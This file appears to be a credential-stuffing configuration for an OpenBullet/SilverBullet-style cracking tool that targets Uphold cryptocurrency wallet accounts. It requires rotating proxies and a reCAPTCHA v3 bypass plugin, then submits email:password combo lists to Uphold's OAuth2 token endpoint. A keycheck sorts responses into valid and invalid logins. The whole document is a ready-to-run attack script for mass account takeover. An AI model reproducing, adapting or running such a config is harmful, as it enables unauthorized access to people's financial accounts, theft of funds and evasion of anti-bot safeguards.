[SETTINGS]
{
  "Name": "uphold",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-28T15:52:36.3520273+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "uphold",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
RecaptchaV3Bypass "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Le1Iy8bAAAAAMdNji-LyayNE4R55KpM8eGxRbYS&co=aHR0cHM6Ly93YWxsZXQudXBob2xkLmNvbTo0NDM.&hl=en&v=VZKEDW9wslPbEc9RmzMqaOAP&size=invisible&cb=vcpka2jqnb6b" "" "https://www.google.com/recaptcha/api2/reload?k=6Le1Iy8bAAAAAMdNji-LyayNE4R55KpM8eGxRbYS" -> VAR "SOLUTION" 
  

#post REQUEST POST "https://api.uphold.com/oauth2/token" 
  CONTENT "client_id=BITRESERVE&client_secret=secret&grant_type=password&password=<PASS>&username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "captcha: <SOLUTION>" 
  HEADER "content-length: 117" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://wallet.uphold.com" 
  HEADER "referer: https://wallet.uphold.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_grant" 
    KEY "invalid_request" 
  KEYCHAIN Success OR 
    KEY "Unauthorized" 
    KEY "unauthorized" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

